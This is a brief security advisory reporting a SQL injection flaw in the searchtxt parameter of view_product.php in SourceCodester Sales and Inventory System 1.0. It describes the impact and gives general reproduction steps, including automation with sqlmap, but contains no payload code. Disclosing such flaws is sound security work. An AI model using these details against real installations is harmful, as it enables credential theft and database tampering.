SourceCodester Sales and Inventory System SQL Injection Vulnerability in View Product Component

A SQL injection vulnerability has been identified in SourceCodester Sales and Inventory System version 1.0. The issue resides in the view_product.php file, specifically within the HTTP POST request handler. The vulnerability arises because the application does not properly sanitize the searchtxt parameter, allowing authenticated attackers to inject arbitrary SQL commands. This exploitation can be performed remotely, and the injected SQL can be used to manipulate the application's database queries.

Impact

Exploitation of this vulnerability allows attackers to bypass authentication, read administrator credentials, and execute arbitrary SQL commands that could be used to exfiltrate sensitive database information or manipulate database contents.

Reproduction

To reproduce this vulnerability, log into the application and navigate to the product list page. Once there, use the search bar to submit SQL injection payloads through the searchtxt parameter. Alternatively, capture the request with a tool like sqlmap, which can automate the exploitation process.